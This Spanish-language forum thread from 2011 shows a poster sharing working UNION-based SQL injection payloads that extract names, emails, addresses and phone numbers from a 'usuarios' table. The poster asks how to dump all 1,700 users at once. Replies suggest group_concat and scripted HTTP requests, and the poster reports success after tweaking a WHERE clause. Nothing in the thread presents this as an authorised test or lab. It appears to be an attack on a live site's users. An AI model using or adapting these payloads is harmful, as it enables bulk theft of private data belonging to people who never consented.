Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Lavacaloca en 24 Julio 2011, 17:54 pm



Título: Obtener todos los datos al mismo tiempo con SQLinjections
Publicado por: Lavacaloca en 24 Julio 2011, 17:54 pm
Hola a todos, sigo con dudas de SQL injections (que no pude resolver solito).

Si quiero imprimir en pantalla todos los datos de todos los usuarios al mismo tiempo,¿ como tendría que hacer?
 Por que puedo hacerlo de 1 en 1 , con un "limit+1,1--"
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+1,1--
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+2,1--
, pero el problema es que son 1700 usuarios que quiero imprimirle los datos, ¿se puede todos al mismo tiempo?


Título: Re: Obtener todos los datos al mismo tiempo con SQLinjections
Publicado por: Shell Root en 25 Julio 2011, 07:49 am
Ps a ver, eso lo puedes hacer de diferente formas, cuando printeas el valor puede que el mismo código te lo generé, -eso depende de la inplementación de la consulta con el lenguaje de programación-. O lo puedes hacer por medio de un lenguaje de programación que permita realizar peticiones HTTP, por ejemplo PHP, PERL, PYTHON, etc...


Título: Re: Obtener todos los datos al mismo tiempo con SQLinjections
Publicado por: s E t H en 26 Julio 2011, 11:55 am
No te lo va a dar en una petición, pero group_concat saca varios datos a la vez


Título: Re: Obtener todos los datos al mismo tiempo con SQLinjections
Publicado por: Lavacaloca en 26 Julio 2011, 14:48 pm
No te lo va a dar en una petición, pero group_concat saca varios datos a la vez

(Creo que me había expresado mal, lo que quería sacar son los usuarios(con todos los datos) al mismo tiempo )

Funciono casi perfecto!!! Lo único malo es que me imprimía de a 10 usuarios y nada más, pero lo solucione con un "where+id<=50"  ---->  "where+id<=60"

Muchas gracias